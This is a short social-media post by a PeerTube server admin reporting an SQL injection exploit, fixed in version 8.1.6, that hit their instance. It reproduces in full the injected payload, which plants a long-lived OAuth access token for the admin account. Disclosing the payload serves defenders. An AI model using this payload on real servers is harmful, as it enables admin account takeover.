Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6.

apz@some.apz.fi

Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:

http://20.240.202.159:8777/x');DO/**/$f$/**/DECLARE/**/uid/**/INT;/**/cid/**/INT;/**/BEGIN/**/EXECUTE/**/'SELECT/**/id/**/FROM/**/'||quote_ident('user')||'/**/WHERE/**/role=0/**/LIMIT/**/1'/**/INTO/**/uid;/**/EXECUTE/**/'SELECT/**/id/**/FROM/**/'||quote_ident('oAuthClient')||'/**/LIMIT/**/1'/**/INTO/**/cid;/**/EXECUTE/**/'INSERT/**/INTO/**/'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')/**/VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';/**/END/**/$f$;--

So this worked because they had a ' after the URL. #infosec